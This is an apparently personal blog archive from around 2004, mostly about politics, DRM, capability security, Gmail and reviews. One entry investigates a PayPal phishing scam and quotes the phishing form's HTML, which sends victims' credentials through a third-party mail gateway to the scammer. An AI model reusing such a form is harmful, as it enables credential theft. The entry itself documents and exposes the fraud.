    If one candidate gets more than half of the first choice votes, he or she is the winner.

    If no candidate gets most than half of the first choice votes, all candidates except the two with the most are ruled out of the counts. The ballot papers of those voters whose first choice vote was for an eliminated candidate are then examined. Any second choice notes from these ballot papers for the two remaining candidates are added to their scores. Whoever of the two remaining candidates then has the most first and second choice votes is the winner.

    (typos are mine)

    Does anyone know if this has a name? I'm pretty certain that it doesn't have many of the desirable properties of other systems.
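
    To make the counting rule concrete, here is a small sketch of it as described in the quoted text. The `count_votes` name and the (first choice, second choice) tuple layout are invented for the example, and ties are not handled.

```python
from collections import Counter


def count_votes(ballots):
    """Count ballots given as (first_choice, second_choice) tuples.

    second_choice may be None. Ties are not handled in this sketch.
    """
    first = Counter(f for f, _ in ballots)
    leader, leader_votes = first.most_common(1)[0]
    # Round one: more than half of the first choices wins outright.
    if leader_votes * 2 > len(ballots):
        return leader

    # Otherwise everyone except the top two is ruled out.
    finalists = [name for name, _ in first.most_common(2)]
    totals = {name: first[name] for name in finalists}
    for f, s in ballots:
        # Second choices count only on ballots whose first choice was eliminated.
        if f not in finalists and s in finalists:
            totals[s] += 1
    return max(totals, key=totals.get)


# Made-up ballots: A leads on first choices, but C's voters prefer B.
ballots = [("A", None)] * 4 + [("B", "A")] * 3 + [("C", "B")] * 2
```

    With those ballots nobody has a majority, C is eliminated, and C's two second choices lift B past A. Note that the second choices of people who voted for A or B first are never looked at.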

    Capability Systems page g...

    Capability Systems page got an FAQ added to the end of it to answer some of the questions that people have emailed me.

    And never, ever deal with SET Lighting and Sound. (Yes, that's an attempt at a google bomb)

    Capability Systems

    400th entry!

    You have probably noticed that the Janie Box has been replaced with a link-roll powered by del.icio.us. It's only updated when I regenerate the site, which is a manual process and not on a cron job at the moment. But if you're bored the site is generally a good source of cool links.

    Also, I've ticked off one of my todo items: writing the text on capability systems:

    When you go to the liquor store, do you hand the cashier your wallet, and ask him to take out what it costs?

    Nope? Then why can your mp3 player read ~/.gnupg/secring.gpg?

    We have ridiculous amounts of ambient authority floating around our programs. A capability system not only allows us to move towards a design conforming to the principle of least authority, but creates a cleaner design at the same time.

    (Read the rest: Practical UNIX Capability Systems)
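
    The flavour of the idea can be shown in a few lines: hand the player an already-open file rather than a path and the run of the filesystem. This is only an illustration of the design style. Plain Python does not enforce it (the function could still call open() itself, which is exactly the ambient authority problem), and the `play` function and the fake track are made up for the example.

```python
import io


def play(audio):
    """An 'mp3 player' that is handed an open file object, not a path.

    Its only input is the stream the caller chose to give it.
    """
    return audio.read(3)  # stand-in for decoding: just read the header bytes


# The caller decides which file to open, then passes only that handle.
# io.BytesIO stands in for open("song.mp3", "rb") so the sketch runs anywhere.
track = io.BytesIO(b"ID3\x03\x00rest-of-file")
header = play(track)
```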

    Things to do after exams

    • Build stackless
    • Write text on cap systems
    • Write text on why javascript isn't evil
    • Get gcal working
    • XML rant

    (this is more of a personal todo than anything else. Nothing to see here, move along)

    Dogs can't vote!Not direc...

    Dogs can't vote!
    Not directly

    If you're American this is your task for today. Oi! Come back. I will hunt you down with my IP address guided custard pie if you don't.

    • Read this bill. If you don't agree with it, you're probably using this blog as an example of Communist propaganda - so I guess I've lost you. If this is the case then you can go now.
    • Lookup your representative
    • Lookup their contact details. Note them down - it's always useful
    • This is a list of people on the subcommittee that has to vote this bill up on the 12th. If your rep is on the subcommittee then phone or write (with paper) to them. If you're writing then lay it out properly with your address and signature and everything. Keep it short and don't rant.
    • If you phone them, you have to speak with the staff member who is dealing with this bill (or the general IP law staffer).
    • You can both phone and write, of course.
    • You can contact your rep even if they aren't on the subcommittee. You can also contact reps who are, even if they aren't your rep.
    • Form letters are bad - try to write it yourself.

    When you have done this, email me or post a comment and I'll order the homing custard pie to self destruct.

    The future of music canno...

    The future of music cannot include record labels as we have them today.

    If you need weird passport photos done (e.g. special sized US NI visa photos) - go to Passport Photo Services on Oxford St. No hassle, very quick and such weird requests handled without issue.

    And did you know that Virgin on Tottenham Court Rd has a real music hardware section on the bottom floor? I'm pretty sure that it's fairly new, but they sell proper desks (Midas and Yamaha) and mics etc. It's all really expensive - but could be useful to have a look at before buying it from somewhere sensible.

    The Quest for Omega - hig...

    The Quest for Omega - highly recommended

    Tracking down a PayPal scammer

    I was bored last night (you know, revision, makes you do strange things...). So I actually opened one of those scam PayPal emails:

    It has come to our attention that your PayPal account information needs to be updated as part of our continuing commitment to protect your account and to reduce the instance of fraud on our website. If you could please take 5-10 minutes out of your online experience and update your personal records you will not run into any future problems with the online service.

    The link text is at www.paypal.com, but the destination is http://210.120.9.236/paypal/login.htm. That's a solaris box running every service under the sun. I've no doubt that it's a hacked box, so I've emailed the netblock owner (no answer). I also emailed the netblock owner for the host where the email came from - pretty prompt answer from them (they are looking into it). But let's have a look at the HTML from the scam page (which looks identical to a real PayPal page):

    <FORM action=http://www.i-st.net/cgi-bin/web2mail.cgi method=post><INPUT type=hidden value=mirub@linuxmail.org name=.email_target> <INPUT type=hidden value=username-password name=.mail_subject> <INPUT type=hidden value=http://210.120.9.236/paypal/loginloading.htm name=.thanks_url>

    Basically, it's emailing him via linuxmail.org (I've emailed linuxmail and told them this). But that's about as far as I can go. I can't find out who is reading that email account. Or can I?

    Subject: New remote root exploit for OpenSSH 3.7.x
    To: mirub@linuxmail.org
    From: xyz@abc.com
    
    I hear that you're an elite hacker. I'd like to share exploits with you, so as
    a gesture of good faith (to get the ball rolling) this exploit is doing the
    blackhat rounds but hasn't hit the mainstream yet. Many juicy boxes are running
    vulnerable sshds:
    
    http://www.doc.ic.ac.uk/~guest01/openssh-xploit.c
    
    Hope to hear from you...

    And the contents of http://www.doc.ic.ac.uk/~guest01/openssh-xploit.c:

    Well, that'll be your IP in the weblogs.
    
    Cheers.

    And indeed:

    62.162.228.219 - - [02/May/2004:11:54:26 +0100] "GET
    /~guest01/openssh-xploit.c HTTP/1.1" 200 51
    "http://adsfree.linuxmail.org/scripts/mail/mesg.mail?folder=INBOX&order=Newest&
    mview=a&mstart=1&.popup=0&msg_uid=1083452662&mprev=1083452665&mnext=1083452657"
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
    inetnum:      62.162.224.0 - 62.162.255.255
    netname:      MTnet-ADSL_subnet
    descr:        ADSL subnet
    descr:        Skopje, Macedonia
    country:      MK
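
    Pulling the address out of a log entry like that is a one-regex job. A minimal sketch, assuming the usual Apache "combined" log format; the referer in `LINE` is shortened from the entry above to keep the example readable, and the pattern is a simplification that doesn't cope with escaped quotes.

```python
import re

# One entry in Apache "combined" format, with the referer abbreviated.
LINE = (
    '62.162.228.219 - - [02/May/2004:11:54:26 +0100] '
    '"GET /~guest01/openssh-xploit.c HTTP/1.1" 200 51 '
    '"http://adsfree.linuxmail.org/scripts/mail/mesg.mail?folder=INBOX" '
    '"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"'
)

COMBINED = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)

# Named groups give the client address, the request and the referring page.
hit = COMBINED.match(LINE).groupdict()
```

    The referer is the useful part here: it shows the request came from someone reading that webmail inbox.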

    Very little chance of getting him in Macedonia. Oh well, at the very least he probably wet himself :)

    As everyone on the planet...

    As everyone on the planet knows by now (it was even front page news on the Evening Standard), Google is floating. This means that I'm probably going to be working there when they float - which should be an interesting experience. I'll come in one day and the net worth of a decent number of people there will have jumped overnight.

    I really hope that this doesn't mess the company up too much. They aren't perfect, but (as I hope to find out) everyone there says that it's a pretty special place. However, it has the coolest S1 filing ever. Brin and Page are staying and make it very clear that they are going to run the company their way. Also:

    the exact value of its planned offering is $2,718,281,828 dollars, which some would immediately recognize as the mathematical constant e.

    Nice.
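
    The figure is easy to check, assuming it is simply e scaled up by a billion and truncated to whole dollars:

```python
import math

# Assumption: the offering is e * 10**9, truncated to a whole number of dollars.
offering = int(math.e * 10**9)
formatted = "${:,}".format(offering)
```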

    Your daily dose of What t...

    Your daily dose of What the Fuck?

    Gmail

    Experiment possibly discounts Many Worlds and Copenhagen interpretations.

    Frankly, wow. Gmail is very cool. In fact I possibly prefer it to mutt, my usual mailreader - but give me a couple of days before I pronounce on that.

    Gmail is the first web application that actually deserves the name. For example, the inbox page has 2 lines of HTML, all the rest looks like:

    D(["v","108424e99f735b5"]
    );
    D(["i",0]
    );
    D(["qu","0 MB","1000 MB","0%","#006633"]
    );
    D(["ds",2,0,0,0,0,0]
    );

    Basically, there's a master Javascript page which parses all that and spits out HTML, client side. That also means that the interface is very fast for the most part. A round-trip to the gmail server takes a while as ever (<1 second) but many operations are just javascript. And the vi key bindings 'j', 'k' and '/' work.
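
    As a rough sketch of how little there is to that data format, the records above can be pulled apart outside the browser too. This assumes each D([...]); argument is valid JSON, which holds for the four records shown but not for everything gmail sends (some message lists use Javascript-only string escapes). The names `PAGE`, `RECORD` and `records` are just for the example.

```python
import json
import re

PAGE = '''D(["v","108424e99f735b5"]
);
D(["i",0]
);
D(["qu","0 MB","1000 MB","0%","#006633"]
);
D(["ds",2,0,0,0,0,0]
);
'''

# Each record is a call D([...]); the array is captured and parsed as JSON.
RECORD = re.compile(r'D\((\[.*?\])\s*\);', re.DOTALL)

records = {}
for match in RECORD.finditer(PAGE):
    # The first element is the record type; the rest are its fields.
    tag, *fields = json.loads(match.group(1))
    records[tag] = fields
```

    What each tag means is a guess from context; "qu" looks like the quota line, for instance.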

    New Signing Key

    All my outgoing mail should be signed by my non-secure key. (Unless I know you use Windows or some other crap client that can't cope with RFCs). My old non-secure key just expired, so here is the new one (signed by my master key):

    (Also available on all good keyservers soon)

    pub  1024D/5FD38350 2004-04-23 Adam Langley (Non secure signing key) 
    sub  1024g/A51F1F5E 2004-04-23 [expires: 2005-04-23]
    -----BEGIN PGP PUBLIC KEY BLOCK-----
    Version: GnuPG v1.2.4 (GNU/Linux)
    
    mQGiBECJMIERBACwCG/dJXNvQmBYCc64/HAIhDLXI75tUe+mxqvlIRCPPVqTFWd7
    jolhGg1BrHI+v1QH+7ERpcr3vBgpvWkhRho1FBEvhyLR6Mdfvb4T06jj77SLikRy
    XvaZfPPnfHhNXdjxEbLe57hPH7dSIrXP21AIZizH9OnBwfvyVA7E5mITiwCgxzxF
    fndrbEAsU2cnjd3cd4T0o7kD/2kq4UX33yKWLl+WiU+Q3eXAorWms0JwDAzCskG4
    wB3fvj7jVSHkuRAd4zHFPqxE155rr30MsY572mFO27EYFI4ZioubVVVZv3pN5V+3
    Hy2np+xPXBtwNir0GB/6ifnPsmW6uxe9X2T64D89cNfuisoEJ+zWBy2xzwyzEV1S
    EQZTA/40iwLN9MgHm8NIMRNQgQJvGoJZ2BKgSsFWtTL6lbeWNAvOKRlD4jpS0B6D
    xBdTDjqrlaQIm8OYZ13LRY24tY035xAHv56zHqBGP7Tg8T3SyRPrvpwa4zKI8giV
    8k/75Va2yMliQIsv2xfxbIYkscDX6QRGzrF1gNUbdiJGLTJBY7Q+QWRhbSBMYW5n
    bGV5IChOb24gc2VjdXJlIHNpZ25pbmcga2V5KSA8YWdsQGltcGVyaWFsdmlvbGV0
    Lm9yZz6IZAQTEQIAJAUCQIkwgQIbAwUJAeEzgAYLCQgHAwIDFQIDAxYCAQIeAQIX
    gAAKCRBYHZWLX9ODUC0CAJ9lUzvCra8GdYxGhsyzai2vVUctYQCfXLFo4qZHrXhQ
    jxUrBrBLZ7xbY3yITAQTEQIADAUCQIkw0QWDAeEzMAAKCRDNpVLfLLY9YB4aAJsF
    V8zYo+gUsWc+awch1TKr0rORkwCeNGyX+HDQ6RBBy64XJQtFnVaYwLy5AQ0EQIkw
    hRAEAM7C1brA5o31SGVLxd2wtPLdHyhyt7Il1HmCXNP6uUaXKN0Z8xbCj0mOTtsz
    HjzBNo7UPInsAkaJOz/bo+iXcCX5X/hgKNljsuhHOP5mVtedvEBCfCFCHAKyHuQy
    YJzkQIkgvPWH+YIqn7LNSVjJ0/ZK9jGa2sB1OwLEwV64nWFnAAMFA/sHM9+UvhIY
    L/LU3rOwRIMXhJolm4RHsem/Xty9ZTQT29CoPqeJdVUkhoVxOc1s3DIUUVegFNxV
    UIEPfs8cqin4HtEBaxl+howHD7AOzH03HRvtBzu0mZ+LC2YuIZxGRJaN0vKMx9m0
    NRh5FSGnWXd6dUdZQtnh7cz3CP2ujvYAxYhPBBgRAgAPBQJAiTCFAhsMBQkB4TOA
    AAoJEFgdlYtf04NQpcMAnR8qmZepHXtFyBvaMMBXXc8krdvwAJ9u6fkkiDbwVYuD
    7v0Wldd93FOdQA==
    =oxRB
    -----END PGP PUBLIC KEY BLOCK-----

    I like the Guardian, it's...

    I like the Guardian, it's generally a pretty good newspaper. But it really does print some utter crap sometimes.

    Joyti De-Laurey will shortly be sentenced for stealing several million pounds from some City squillionaires. But if there was any justice in this world, Joyti would not only be a free woman, she'd be given a medal for services to the community.

    So, it seems, robbing the rich and giving to the poor is not only ok within the confines of a representative democratic tax system, it's ok all the time. So I assume that he leaves his front door unlocked at night so that all the homeless poor people can rightfully rob him without risking hurting themselves while forcing the door.

    Somehow the writer manages the double-think that the victims (oh and, by the way, As crimes go, this was a victimless one) are both lazy and foolish (Fools and their money are soon parted) and hardworking (The trio were far too busy with their 6am meetings and long-distance business trips) at the same time.

    The writer also has an interesting grasp of economic reality: [their money] was just lying dormant in their accounts, doing nothing. I wonder if he has ever wondered where the bank loans for buying his house, or for starting the local businesses which serve his needs, come from. He might like to reflect that there's a word for when banks stop lending money - recession.

    It's just disappointing that writers with such a lack of rationality get printed in serious national press.

    US weapons in space [via ...

    US weapons in space [via JWZ].

    highly detailed plans for a whizbang space arsenal led by the "Rods From God" -- bundles of tungsten rods fired from orbiting platforms, hurtling toward earth at 3,700 meters per second, accurate within a range of 8 meters and able to destroy even the most hardened targets

    So, 3700 m/s gives 6.8 MJ/kg of kinetic energy. One tonne of TNT is 4612 MJ. So, in order to deliver a 1 tonne explosion they need to launch 674 kg of the stuff. For a one shot weapon. Now, the shuttle costs $50,000/kg to low earth orbit (source). That's $34 million per tonne of TNT equivalent. Or $30 million per Fallujah strike, if you like.
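
    The arithmetic can be checked with a few lines of Python. This is only a sketch using the figures from the post: the function names are made up for illustration, and the TNT figure of 4612 MJ per tonne is the one used above (the conventional definition is 4184 MJ per tonne, which would make the rods look slightly better).

```python
# Figures taken from the post; the helper names are hypothetical.
IMPACT_SPEED = 3700.0          # m/s, from the quoted article
TNT_TONNE_MJ = 4612.0          # MJ per tonne of TNT, as used in the post
LAUNCH_COST_PER_KG = 50000.0   # dollars per kg to low earth orbit, from the post

def kinetic_energy_mj_per_kg(speed):
    """Kinetic energy of one kilogram moving at `speed` m/s, in megajoules."""
    return 0.5 * speed ** 2 / 1e6

def mass_for_tonnes_tnt(tonnes, speed):
    """Kilograms needed at `speed` m/s to match `tonnes` of TNT."""
    return tonnes * TNT_TONNE_MJ / kinetic_energy_mj_per_kg(speed)

energy = kinetic_energy_mj_per_kg(IMPACT_SPEED)
mass = mass_for_tonnes_tnt(1, IMPACT_SPEED)
cost = mass * LAUNCH_COST_PER_KG
print("%.2f MJ/kg, %.0f kg, $%.1f million" % (energy, mass, cost / 1e6))
```

    That comes out at a little under 7 MJ/kg, about 674 kg and just under $34 million for a one-tonne-equivalent strike, ignoring the cost of the platform itself.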

    Still waiting for the dra...

    Still waiting for the draft ID cards bill, but if you want a little insight from New Labour try this from Sion Simon (Labour MP):

    I mean this civil liberties business I don't understand, what civil liberties implications, it's nonsense. I mean if you've done nothing wrong what are you frightened of?

    (BBC R4, Any Questions, 9th April 2004)

    So, ladies and gentlemen. Have an ID card - if you've done nothing wrong you have nothing to fear.

    Well, we're going to have...

    Well, we're going to have a referendum on the EU Constitution then. That means that I've got to read the damn thing and it's a huge tangle of politically correct nonsense for the most part.

    (For those who don't know how UK policy is announced these days: first there's the oblique comment (Blair on Radio 4 a few days ago), then there's the leak to the press (just now), then there's the full announcement (this week I expect).)

    RSI

    Well, it's probably good for revision that I'm going to cut right down on typing now since I'm starting to feel the first signs of RSI. Probably because I have a crappy, self-taught typing style.

    I'm wondering about switching to Dvorak, but I've just been playing with it (my version of it) and it doesn't seem to help any. If anything, it's worse.

    Here's a time-lapse video...

    Here's a time-lapse video of the setup and strike of the Medics Fashion Show (you can see the photos here). It's WMV format (I didn't do it!) but it's not fuckwared and my install of mplayer can cope with it.

    dramsoc.wmv (50M)

    Looks like SourceForge ha...

    Looks like SourceForge have pulled the source to Playfair [/. story].

    See, as an act of civil disobedience against those who believe that code should be suppressed to enforce a huge increase in copyright powers I wish I had the source code to Playfair so that lots of people could download it and prove how futile pulling the code was.

    But all I have are these two random, 326K files. I wonder what I could do with those...

    Update: seriously, you people who can't figure it out are too dumb to use the program anyway!

    British people can now li...

    British people can now live happy in the knowledge that the Criminal Justice Act (2003) came into force yesterday:

    They enable police to retain fingerprints and DNA samples from anyone arrested - whether or not they are charged.

    The Home Office will look at whether police should be able to [drug] test all suspects arrested for offenses such as burglary and theft which are considered as "driving up" drug abuse.

    So what the Police want is a national DNA and fingerprint database, by the back door. If they actually tried to announce it, there would be dissent - and Labour are fed up with that after the whole tuition fees saga. So, slowly, they are going to build it anyway.

    You have to wonder how difficult it would be to set up a new political party. And `difficult' means `money' in this case. I think a 30-second TV slot would cost you about 250K, so 10M wouldn't even be a large advertising budget. I'm sure 5M would slip away all too quickly in other costs.

    In the 1997/8 fiscal year, corporate donations to the Conservatives (the biggest number) were about 2.8M - so one would need some significantly more generous investors.

    Hmm...

    A Summer Ball post

    Imperial College Union Summer Ball

    What's Wrong with Janus and friends

    Janus is Microsoft's new DRM (fuckware) system. The details are, frankly, unimportant - you only need to know this much:

    Janus would add a hacker-resistant clock to portable music players for files encoded in Microsoft's proprietary Windows Media Audio format. That in turn would help let subscription services such as Napster put rented tracks on portable devices--something that's not currently allowed. Fans of portable players could then pay as little as $10 a month for ongoing access to hundreds of thousands of songs, instead of buying song downloads one at a time for about a dollar a piece.

    This is wrong. This is bad. This is evil. This is why:

    Control

    This requires a trusted clock, which is a form of client-side security. That doesn't work; this has been known for many years. Unfortunately, these companies will use, and have used, the legal system to try and make it work.

    Of course, content providers can only give music to trusted hardware - hardware that they trust to expire music. This means that the number of companies that can manufacture such hardware is very limited. It also means that since you have to go online to "renew" your music that they can disable any hardware at any time by not renewing.

    If you read the license agreement this will be one of their legal rights.

    No hardware manufacturer is going to piss these people off, on pain of a whole lot of angry customers or the loss of a manufacturing license. So they can invent any rights for themselves that they wish and it's protected by law (DMCA/EUCD).

    What rights? Well, at the moment they have invented the right to stop you fast-forwarding the legal warning/trailers on some DVDs (with compliant players). They lost control of the DVD player market so this isn't enforced. You can bet they're not going to make that mistake again.

    Public Domain

    Remember that after a certain number of years the government granted monopoly on a given work expires? Remember that last time you put on a Shakespeare play that you didn't have to pay his family/estate anything?

    Fine and dandy because when the copyright on these works expires you won't be able to play them anymore.

    Their control of this is enforced by hardware and never expires.

    History

    Go down to your local library. You can probably look up editions of the local paper going back decades. This is our history.

    So when your TV news is subscription. And your paper is the digital edition. And your downloaded magazines are rented. Where's your history?

    This is wrong. This is bad. This is evil.

    Back on the good news...

    Lessig's new book is out in both dead-tree format and electronic, under a CC license.

    That's the good news. On the other hand...

    SciAm has published this, an interview with "the father of MP3" from which I'll pull a few quotes:

    The culture of theft that turns around MP3 is detestable.

    Misuse of the word theft in the usual RIAA-newspeak way.

    I don't see [iTunes etc] as a solution in the long run, because they put too many limits on the users.

    Ok, good

    What we need is a system that guarantees the protection of copyrights but at the same time is completely transparent and universal. With the Digital Media Project [DMP] we are working to develop a format that meets these requirements.

    For example, you could play a specific title until a certain date, or you could buy a subscription allowing you to play anything you want for a given period.

    the algorithms used for copyright protection don't come as hardware but as software, so that you can update them with an Internet or wireless connection if they are cracked.

    Hmm, I'm betting that this `father of MP3' is a manager. It would take years of training to come out with such woolly-worded crap. "It's open" yet you can be time limited. "It's not crack-proof" yet people will (willingly?) download updates to `fix' their players.

    And their website is, as expected, full of utter rose-tinted rubbish.

    Seriously, how do people get away with not putting a single hour's thought into these systems?

    It turns out that Apple have very neatly managed to use the RIAA's stupidity against them by having a DRM free service and just telling the RIAA that it's protected. Genius.

    The Ends of the Earth (Br...

    The Ends of the Earth (Bruce Sterling)

    Why do people bother with...

    Why do people bother with quantum cryptography? (and they do, companies exist that will supply QC products if you have the money). Wouldn't quantum entanglement cryptography achieve the same without a dedicated fiber link? Or are the practical problems with QEC really that bad?

    Something to ask Pooh next time I see him.

    Gary's shoe: Ewwwwwwwww! ...

    Gary's shoe: Ewwwwwwwww! Really, really yuck.

    But seriously, we rock.

    Katie Melua: Call off the Search

    Ok, so a few reviews that I've been meaning to get round to...

    So this album has hit 4x platinum but I'm not quite sure why. I like it - quite a lot actually - but I'm still a little confused where this hidden hunger for `country' music has come from in the general population. Of course, it's not called country music because that doesn't sell but it sounds like country/folk music. It's certainly not jazz.

    But for those who thought that Norah Jones was a one off, the copycats are proving them wrong. At the top of the charts at the moment is the second Norah Jones, this album and "20 Something".

    Now, I think that Mrs Melua has a better voice than Mrs Jones. I know that's a pretty flammable statement in some places but I think that the recording on this album is just better than Come Away With Me. A bit like Road to Perdition - a very beautiful work and a welcome break between more exciting stuff. But no substitute.

    Greg Egan: Luminous

    It's fairly common knowledge to readers of IV that I'm quite a big fan of Greg Egan. In fact, a browse of his website shows that I've read almost every book he has in print.

    Luminous is a collection of short stories and this actually means that you get a higher "cool idea" frequency than in some of his novels. One of the stories is pretty forgettable, but all the rest are classic Egan. A number of the stories hammer home the conclusions of a Strong AI belief - something that the world is going to have to come to grips with at some point (I believe so, as a Strong AIist, of course. Others don't). The title story is very Gödel, Escher, Bach, dealing, as it does, with axiomatic systems.

    I'm not going to write a list of the others here. Borrow the book off me if you want to find out. Highly recommended.

    Iain M. Banks: Excession

    This is the first Iain M. Banks book that I've read. People have been mentioning him to me for ages and I finally read one on the train to (and from) Cardiff.

    Now, this is a political novel - not science fiction. It may be set in space with spaceships and the like - but that doesn't make it science fiction. Greg Egan is sci fi - this is space opera.

    But as far as political novels go, it's very good. Almost excellent in fact. But I don't feel that I would have missed anything by not reading it (except for the best ship names in a book, ever). Something to read as the miles go by.

    Well, Imperial College pl...

    Well, Imperial College played host to the BBC in the form of Question Time on Thurs. (The one where a cabinet minister said "When Gordon Brown became Prime Minister"). Then we struck it - TV really isn't all that impressive. It looks ok to the edges of the camera's field of vision then it's just cables everywhere. The lighting rig was fairly impressive, but the sound was nothing to write home about.

    I've a (telephone) interview with Google for a summer job this year. And congrats to Gary, Steve and Mike who've all sorted out jobs for when they leave Imperial.

    In to College for 9am tomorrow. And don't forget that it's Mothers Day.

    This is just ... well, al...

    This is just ... well, almost amusing. But in that "laugh because you don't know what else to do" way [via WhiteRose, source]

    WHAT do you give someone who's been proved innocent after spending the best part of their life behind bars, wrongfully convicted of a crime they didn't commit?

    An apology, maybe? Counselling? Champagne? Compensation? Well, if you're David Blunkett, the Labour Home Secretary, the choice is simple: you give them a big, fat bill for the cost of board and lodgings for the time they spent freeloading at Her Majesty's Pleasure in British prisons.

    On Tuesday, Blunkett will fight in the Royal Courts of Justice in London for the right to charge victims of miscarriages of justice more than £3000 for every year they spent in jail while wrongly convicted. The logic is that the innocent man shouldn't have been in prison eating free porridge and sleeping for nothing under regulation grey blankets.

    Though now I come to think about it, there's a prison near White City I believe, and £3000/year is a lot cheaper than what I'm paying now. I wonder if they would consider renting?

    IPRED

    Fluffy BBC introduction if you don't know what IPRED is.

    In red, the FFII (from here), and in blue, the text of the directive (taken from here).

    Anton Piller orders (secret court authorisations of raids for evidence by the plaintiff's agents)

    Member States shall ensure that even before the commencement of proceedings on the merits of the case the competent judicial authorities may, on application by a party who has presented reasonably available evidence to support his claims that his intellectual property right has been infringed or is about to be infringed, order prompt and effective provisional measures to preserve relevant evidence in regard to the alleged infringement.

    It's very unclear in the document as to who takes the action. Firstly, the /. crowd are wrong that this gives a right to corporate raids - you still need judicial authorities to sign off on it. We shall have to see how this is written into national law.

    Mareva injunctions (freezing of assets, even before a case has been discussed in Court).

    In cases of infringement committed on a commercial scale, ... the judicial authorities may order the precautionary seizure of the movable and immovable property of the alleged infringer, including the blocking of his bank accounts and other assets.

    Member States shall ensure that the provisional measures referred to in paragraphs 1 and 1a may, in appropriate cases, be taken without the defendant having been heard.

    The FFII seems to be perfectly correct on this one.

    New powers to demand the disclosure of very extensive commercial and personal information.

    Well, you can look at Article 9 yourself, it goes on a long while. But my reading of it is that the FFII is correct.

    And the admissibility of denounciations by anonymous witnesses as court evidence.

    Member States may take measures to protect witnesses' identity.

    Right on again.

    We'll have to fight at the national level now. I'm getting tired of this.

    It's pretty wrong for me ...

    It's pretty wrong for me to ridicule specific DoC support requests here. But it's so tempting, (mentioning no names...). Today alone, I've already had one person ask if /usr/sbin/sendmail -t is going to work on our Windows ASP server (and there's no confusion here, he's absolutely aware that it's a Windows box).

    And to round it off, someone asked if they should delete their root filesystem when trying to free up some space because it's several gigabytes big.

    Oh boy.

    I've been away for the we...

    I've been away for the weekend. So if you've not heard back from me in a couple of days - that's why. I'm going through my email now.

    Friday night was spent stage teching Tokyo Dragons (pictures). MTV were filming this event, and they are meant to be a major band for some reason. I thought they were ok, but nothing special.

    Though their bass guitarist did make his own amp, so they gain credits for that.

    Yes, I've got 32. I'll be...

    Yes, I've got 32. I'll be in tomorrow morning.

    Well, a kernel upgrade of...

    Well, a kernel upgrade of the Union server on Tuesday showed that 2.4.25's XFS support is incomplete. It contains some of XFS, but not enough to actually get a working server (I need ACL support at least). And I can't find patches to add the missing bits to 2.4.25 either. Bugger.

    The medic's play (Alice in Wonderland) on in the UCH at the moment is very good. Go see it tonight (£6) or tomorrow (£7) starting at 7:30 (ish).

    Last night's band night with Natascha Sohl went very well. She's very good and my favorite band that we've worked with so far. Proper control of the lighting by Steve meant that it looked very good too.

    And we're doing it all again tomorrow, but with three bands and (at least) one film crew. That includes three drum kits that we've got to handle somehow. And I've got other commitments for part of tomorrow night.

    Also, I'm on Orkut now. Mail me if you need an introduction.

    (Though I'm home this weekend (and Monday) so I've very little email access.)

    And tonight was going to be my night off and the first time I haven't been doing something in the Union this week. But the Medic's director just phoned so I'm going to help them now... oh well.

    These are predictions fro...

    These are predictions from a "leaked Pentagon report" that were published in The Observer today (news section, page 3).

    I just want them here so I can look back in a few years time.

    • Future wars will be fought over the issue of survival rather than religion, ideology or national honour.
    • By 2007 violent storms smash coastal barriers rendering large parts of the Netherlands uninhabitable. Cities like The Hague are abandoned.
    • Between 2010 and 2020 Europe is hardest hit by climatic change with an average annual temperature drop of 6F. Climate in Britain becomes colder and drier as its weather begins to resemble Siberia's.
    • Deaths from war and famine run in the millions as the population is reduced until the Earth can cope.
    • Riots and internal conflict tear apart India and Indonesia.
    • Access to water becomes a major battleground. The Nile, Danube and Amazon are all at high risk.
    • A 'significant drop' in the planet's ability to sustain its population will become apparent over the next 20 years.
    • Rich areas like the US and Europe would become 'virtual fortresses' to prevent millions of migrants from entering after being forced from land drowned by sea-level rise or no longer able to grow crops.
    • Nuclear arms proliferation is inevitable. Japan, South Korea, and Germany develop nuclear-weapons capabilities, as do Iran, Egypt and North Korea. Israel, China, India and Pakistan also are poised to use the bomb.
    • By 2010 the US and Europe will experience a third more days with peak temperatures above 90F. Climate becomes an 'economic nuisance' as storms, droughts and hot spells create havoc for farmers.
    • More than 400m people in subtropical regions at risk.
    • Europe will face huge internal struggles as it copes with massive numbers of migrants arriving at its shores. Southern Europe is beleaguered by refugees from hard-hit Africa.
    • Mega-droughts affect the world's major breadbaskets, including America's Midwest, where strong winds bring soil loss.
    • China's huge population make it particularly vulnerable. Bangladesh becomes nearly uninhabitable because of a rising sea level, which contaminates inland water supplies.

    New kernel bug. All upgra...

    New kernel bug. All upgrade to 2.4.25 or 2.6.3. DoC backend webserver compiling now and will be rebooted in a minute. Union server waiting for GR patch against 2.4.25.

    Ok, a slightly political ...

    Ok, a slightly political entry today...

    Firstly, I tip my hat to the people behind a new scholarship created for whites only. And I hope it enrages every racist black organisation simply because I want to see them defend their black only scholarships and attack this at the same time. A wonderful example of why racism by white people is racist and racism by black people is `positive action'.

    Next up, a Guardian article today (page 3): Goodbye ecstasy, hello 5-Meo-DMT. It's only in their paper and beta-test editions, so no link I'm afraid.

    It discusses the increasing use of chemicals that are legal in the US, but illegal here, such as 5-MeO-[DMT|DiPT] and 2C-[B|I]. Now these chemicals are still fairly rare and I've never even heard of anyone taking them. (But don't confuse 5-MeO-DMT with regular N,N-DMT, which is much older and more common).

    The rapid growth in the transatlantic online trade in such chemicals has been fueled by international differences over legality. While Britain has outlawed all of these drugs under an amendment to the Misuse Of Drugs Act in February 2002 they remain legal in most other countries, including the majority of EU member states. Even in the US, despite some of the most draconian anti-drug laws in the world, the bulk of research chemicals are legal to manufacture, sell, possess and consume.

    The leading research chemical sites compete openly to offer the purest product, the best customer service, the fastest deliveries and the lowest prices. Sophisticated e-commerce technology, electronic payment systems and next day courier services guarantee swift, effortless "one-click" transactions

    The EU recently recommended that member states ban 2C-I as a matter of urgency, although they turned up no evidence of large-scale manufacture. The police, however, were quick to sound the alarm. "The chemicals to make this are available and it can be made pretty much anywhere," a source said.

    Nowhere have we had the slightest justification of the banning of these chemicals. It's not even discussed - they don't even try to give reasons. We have now reached the point where "drugs are baadd" is an axiom of our society.

    I'm perfectly free to go jump out of a plane. A totally unconstructive, reckless act that serves no end but my own pleasure. People who trek across the Arctic are heroes. Those who die are tragic.

